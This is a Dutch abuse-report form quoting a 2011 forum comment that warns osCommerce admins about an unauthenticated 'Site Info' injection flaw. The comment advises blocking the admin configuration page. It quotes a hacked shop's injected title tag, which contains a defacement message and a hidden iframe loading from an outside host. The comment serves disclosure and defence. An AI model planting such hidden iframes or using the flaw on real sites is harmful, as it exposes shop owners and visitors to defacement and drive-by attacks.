Abuse Melding

Je hebt een klacht over de onderstaande posting:

26-07-2011, 22:23 door Bitwiper

Aanvulling: de oorzaak is wellicht een op 2011-07-10 gepubliceerde 0Day voor de open source "osCommerce" software (van http://www.oscommerce.com/). Kennelijk kun je, zonder te zijn ingelogd, de "Site Info" wijzigen (en zo bijv. javascript invoegen). De "exploit" (niet veel meet dan een aanwijzing) staat op http://www.1337day.com/exploits/16505. N.b. ik publiceer de URL naar deze exploit omdat de site bekend is bij blackhats, en webserver admins mogelijk beter maatregelen kunnen nemen/workarounds kunnen toepassen, bijv. door de URL /admin/configuration.php van buitenaf ontoegankelijk te maken (in elk geval tot er een fix is, en wellicht ook daarna). Bijv. hxxp://www.bikes4less.nl/catalog/ (bezoeken op eigen risico!) laat zien dat deze site al eerder werd gekraakt met waarschijnlijk dezelfde exploit: <title>Hacked By Tn Mahdi Sad Hacker<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe></title> van de rest van die webpage klopt trouwens ook niet veel meer.

Beschrijf je klacht (Optioneel):

captcha